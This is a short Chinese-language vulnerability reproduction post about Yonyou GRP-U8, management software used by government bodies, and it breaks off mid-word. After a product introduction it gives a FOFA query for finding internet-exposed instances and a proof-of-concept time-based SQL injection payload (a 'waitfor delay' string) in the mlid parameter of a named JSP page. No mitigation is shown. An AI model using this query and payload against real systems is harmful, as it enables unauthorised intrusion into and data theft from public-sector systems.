简介

用友GRP-U8是用友软件针对政府及公共部门推出的管理软件产品。

GRP是Government Resource Planning的缩写，即政府资源计划。

这个产品设计用于满足政府部门在财务管理、人力资源管理、资产管理、供应链管理等方面的需求。

漏洞复现

FOFA：

app="用友-GRP-U8"

访问界面如下所示：

POC:

/u8qx/dialog_moreUser_check.jsp?mlid=1

/u8qx/dialog_moreUser_check.jsp?mlid=';waitfor+delay+'0:0:5'--

拼接url访问返回信息如下所示：

ip:port/u8qx/dialog_moreUser_check.jsp?mlid=1

POC访